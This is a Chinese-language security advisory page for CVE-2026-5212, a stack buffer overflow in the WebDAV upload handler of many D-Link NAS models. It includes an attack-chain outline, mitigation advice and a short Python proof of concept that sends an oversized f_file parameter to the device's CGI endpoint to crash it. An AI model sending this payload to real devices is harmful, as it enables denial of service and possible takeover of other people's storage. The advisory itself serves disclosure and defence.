CVE-2026-5212 CVSS 8.8 高危

CVE-2026-5212 D-Link多款设备Webdav栈缓冲区溢出漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5212

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款NAS设备在固件版本20260205之前的Webdav_Upload_File函数中存在严重的栈缓冲区溢出漏洞。由于未对用户输入的f_file参数进行严格边界检查，攻击者可远程发送特制数据包触发溢出，导致设备崩溃或执行任意代码，进而完全控制设备。

技术细节

该漏洞源于D-Link设备Web服务器/cgi-bin/webdav_mgr.cgi文件中的Webdav_Upload_File函数存在编码缺陷。在处理文件上传请求时，程序将用户提供的f_file参数直接拷贝到栈上的固定大小缓冲区，未进行长度验证。攻击者可以通过发送超长的字符串作为f_file参数的值，覆盖栈上的返回地址。由于攻击复杂度低且无需用户交互，攻击者可利用此漏洞在目标系统上执行任意代码，获得系统控制权限，严重影响数据的机密性、完整性和可用性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者扫描网络，识别出存在漏洞的D-Link NAS设备及其Web服务接口。

STEP 2

步骤2：发送恶意请求

攻击者向/cgi-bin/webdav_mgr.cgi发送POST请求，其中f_file参数包含超长的恶意Payload。

STEP 3

步骤3：触发溢出

由于缺乏边界检查，Payload溢出栈缓冲区，覆盖函数返回地址。

STEP 4

步骤4：执行代码

程序流程被劫持，跳转执行攻击者植入的Shellcode，导致设备被控制或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_ip = "<TARGET_IP>"
target_url = f"http://{target_ip}/cgi-bin/webdav_mgr.cgi"

# Generate payload to trigger buffer overflow
# Adjust length based on specific buffer size (e.g., > 500 bytes)
payload = b"A" * 1000

data = {
    "f_file": payload.decode('latin-1'),
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Response status: {response.status_code}")
except Exception as e:
    print(f"Exploit attempt completed or service crashed: {e}")

影响范围

D-Link DNS-120 (<= 20260205)

D-Link DNR-202L (<= 20260205)

D-Link DNS-315L (<= 20260205)

D-Link DNS-320 (<= 20260205)

D-Link DNS-320L (<= 20260205)

D-Link DNS-320LW (<= 20260205)

D-Link DNS-321 (<= 20260205)

D-Link DNR-322L (<= 20260205)

D-Link DNS-323 (<= 20260205)

D-Link DNS-325 (<= 20260205)

D-Link DNS-326 (<= 20260205)

D-Link DNS-327L (<= 20260205)

D-Link DNR-326 (<= 20260205)

D-Link DNS-340L (<= 20260205)

D-Link DNS-343 (<= 20260205)

D-Link DNS-345 (<= 20260205)

D-Link DNS-726-4 (<= 20260205)

D-Link DNS-1100-4 (<= 20260205)

D-Link DNS-1200-05 (<= 20260205)

D-Link DNS-1550-04 (<= 20260205)

防御指南

临时缓解措施

建议立即访问D-Link官方网站下载并安装最新的安全补丁。如果暂时无法进行固件升级，应通过防火墙策略将设备的Web管理界面仅限于受信任的内网IP访问，或者直接关闭WebDAV功能，以降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5212
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5212
3 Details https://www.cvedetails.com/cve/CVE-2026-5212/
4 VulDB https://vuldb.com/cve/CVE-2026-5212
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_166/166.md
6 Link https://vuldb.com/submit/780435
7 Link https://vuldb.com/submit/780436
8 Link https://vuldb.com/vuln/354348
9 Link https://vuldb.com/vuln/354348/cti
10 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表